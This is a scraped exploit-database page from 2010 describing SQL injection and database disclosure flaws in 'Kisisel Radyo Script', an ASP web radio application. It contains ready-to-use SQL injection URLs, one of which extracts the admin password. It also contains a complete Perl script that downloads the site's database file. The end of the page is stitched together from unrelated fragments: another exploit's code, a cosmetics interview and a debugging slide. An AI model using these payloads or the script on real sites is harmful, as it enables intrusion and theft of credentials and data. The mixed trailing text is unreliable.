[webapps / 0day] - Kisisel Radyo Script - Multiple
Transkript
[webapps / 0day] - Kisisel Radyo Script - Multiple
[webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048 [webapps / 0day] - Kisisel Radyo Script - Multiple Vuln... Article URL exploit.php?eid=8925157864cbb8036394159.83639048 Author SecurityHome.eu Published: 17 October 2010 <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Kisisel Radyo Script - Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Kisisel Radyo Script - Multiple Vulnerabilities by FuRty in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(tr ue);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================== ========================= Kisisel Radyo Script - Multiple Vulnerabilities =============================================== ############################################ Author: FuRty Contact : [email protected] Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group ############################################ Script : Kisisel Radyo Script Version : N/A Download : http://www.aspindir.com ########################################### SQL Injection Vulnerable in radyo.asp #################################### id = Request.QueryString("id") Set baglanti = Server.CreateObject("Adodb.Connection") baglanti.Open "Provider=Microsoft.Jet.Oledb.4.0;Data Server.MapPath(""&veriyolu&"") Page 1/3 Source=" & [webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048 set rsust=Server.CreateObject("ADODB.RecordSet") sql = "Select * from sayfa WHERE id="&id&"" ############################################ http://VICTIM/path/radyo.asp?Id=2 and 1=1 [True] http://VICTIM/path/radyo.asp?Id=2 and 1=0 [False] http://VICTIM/path/radyo.asp?Id=2%20union%20select%200,1,adminsifre%20from%20siteayar%20where% 20id=1 ############################################## Remote Database Disclosure Exploit ############################################## #!/usr/bin/perl -w # # Kisisel Radyo Script Remote Database Disclosure Exploit # Coded: FuRty # Thanks: RedGuard, KnocKout, TrSniper and all Justic3 Group # Contact : [email protected] # Demo: http://www.kardeslermarble.com/radyo/ use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Kisisel Radyo Script Remote Database Disclosure Exploit by FuRty'); system('color 4'); if(@ARGV < 2) { print "[-]Ornegi inceleyin "; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ "; print "[+] usage2 : perl $0 localhost / "; } print " ************************************************************************ "; print "* Kisisel Radyo Script Remote Database Disclosure Exploit * Page 2/3 [webapps / 0day] - Kisisel Radyo Script - Multiple Vulnerabi http://www.securityhome.eu/exploits/exploit.php?eid=8925157864cbb8036394159.83639048 "; print "* Exploited By : FuRty * "; print "* msn : [email protected] * "; print "* Thanks: RedGuard,KnocKout, TrSniper and All Justic3 Group * "; print "********************************************************************* "; ($TargetIP, $path, $File,) = @ARGV; $File="sevvo/eco23.mdb"; my $url = "http://" . $TargetIP . $path . $File; print " wait!!! "; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "C:/db.mdb"); if ($request->is_success) { print "[+] $url Exploited! "; print "[+] Database saved to C:/db.mdb "; exit(); } else { print "[!] Exploiting $url Failed ! [!] ".$request->status_line." "; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-17]</pre></body></html> Page 3/3
Benzer belgeler
MediaSuite.ca File Disclosure
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
Röportajı Okumak İçin Tıklayınız
Kişisel bakım ürünlerinden oluşan ürün gamınızda hangi ürünler ve markalar bulunmakta?
Dermoskin, Medobiohtin, Acnegun, Foltene ve Fittydent markaları bulunmaktadır.
Medobiohtin saç, cilt ve tırnak...
SignalSEC Corp. Zafiyet Araştırma Yöntemleri [Bug Hunting]
Dynamic Reversing
Intelligent BreakPoints :
BA : Breakpoint Access (ba r 0x1234 , ba w 0x1234 )
Breakpoint when a function reads recv() ‘ s buffer
argument